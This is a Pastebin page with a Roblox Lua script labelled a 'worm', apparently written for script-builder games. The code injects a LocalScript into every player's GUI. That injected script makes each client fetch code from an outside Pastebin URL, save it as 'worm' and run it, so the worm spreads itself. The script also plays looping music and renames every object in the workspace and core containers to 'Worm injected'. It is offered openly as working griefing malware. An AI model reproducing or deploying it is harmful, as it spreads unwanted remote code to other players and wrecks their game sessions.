Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- --Made By personsadminlol--
- --Update Logs--
- --Fixed Lag for person runing script--
- ---Adding and need help with--
- --Makeing own website for worm (so can run script with website)--
- --More lag--
- --END NOW--
- -- __ __ ________ _______
- / \ / \___________ _____ \_____ \ \ _ \
- \ \/\/ / _ \_ __ \/ \ / ____/ / /_\ \
- \ ( <_> ) | \/ Y Y \ / \ \ \_/ \
- \__/\ / \____/|__| |__|_| / \_______ \ /\ \_____ /
- \/ \/ \/ \/ \/--
- if script.ClassName ~= "LocalScript" then
- local hs = game:GetService'HttpService'
- function makemusic()
- local music = Instance.new("Sound",workspace)
- music.Name = "WORMMLGMUSIC"
- music.SoundId = "rbxassetid://278068026"
- music.Volume = 1
- music.Looped = true
- music:Play()
- end
- workspace.ChildRemoved:connect(function(p)
- wait(0.1)
- if p.Name == "WORMMLGMUSIC" then
- for index, child in pairs(workspace:GetChildren()) do
- if child.Name == "WORMMLGMUSIC" then
- i = i + 1
- end
- end
- if i == 0 then
- makemusic()
- end
- end
- end)
- i = 0
- for index, child in pairs(workspace:GetChildren()) do
- if child.Name == "WORMMLGMUSIC" then
- i = i + 1
- end
- end
- if i == 0 then
- makemusic()
- end
- while wait(1) do
- for index, child in pairs(game:GetService'Players':GetChildren()) do
- newLocalScript([[
- game.Players.LocalPlayer.PlayerGui.SB_OutputGUI.Main.Output.Header.FPS.Text = "this isn't a logger, dumb-dumbs "
- wait()
- game:GetService'Players'.LocalPlayer.PlayerGui.SB_DataTransfer.SB_CommandRemote.Value = 'h/http://pastebin.com/raw/WVeisNWN' wait(0.25) game:GetService'Players'.LocalPlayer.PlayerGui.SB_DataTransfer.SB_CommandRemote.Value = 'createhttp/worm/http://pastebin.com/raw/WVeisNWN' wait(0.25) game:GetService'Players'.LocalPlayer.PlayerGui.SB_DataTransfer.SB_CommandRemote.Value = 'save/worm' ]],child.PlayerGui)
- end
- end
- else
- game:GetService'Players'.LocalPlayer.PlayerGui.SB_DataTransfer.SB_CommandRemote.Value = 'h/http://pastebin.com/raw/WVeisNWN'
- end
- while true do
- stuff=game.Workspace:GetChildren()
- stuff2=game.Lighting:GetChildren()
- stuff3=game.StarterGui:GetChildren()
- stuff4=game.StarterPack:GetChildren()
- wait(1)
- for i=1,#stuff do
- if stuff[i].Name~="Virus" then
- stuff[i].Name="Worm injected"
- game.Workspace.Name="Worm injected"
- end
- end
- wait(1)
- for i=1,#stuff2 do
- stuff2[i].Name="Worm injected"
- game.Lighting.Name="Worm injected"
- end
- wait(1)
- for i=1,#stuff3 do
- stuff3[i].Name="Worm injected"
- game.StarterGui.Name="Worm injected"
- end
- wait(1)
- for i=1,#stuff4 do
- stuff4[i].Name="Worm injected"
- game.StarterPack.Name="Worm injected"
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement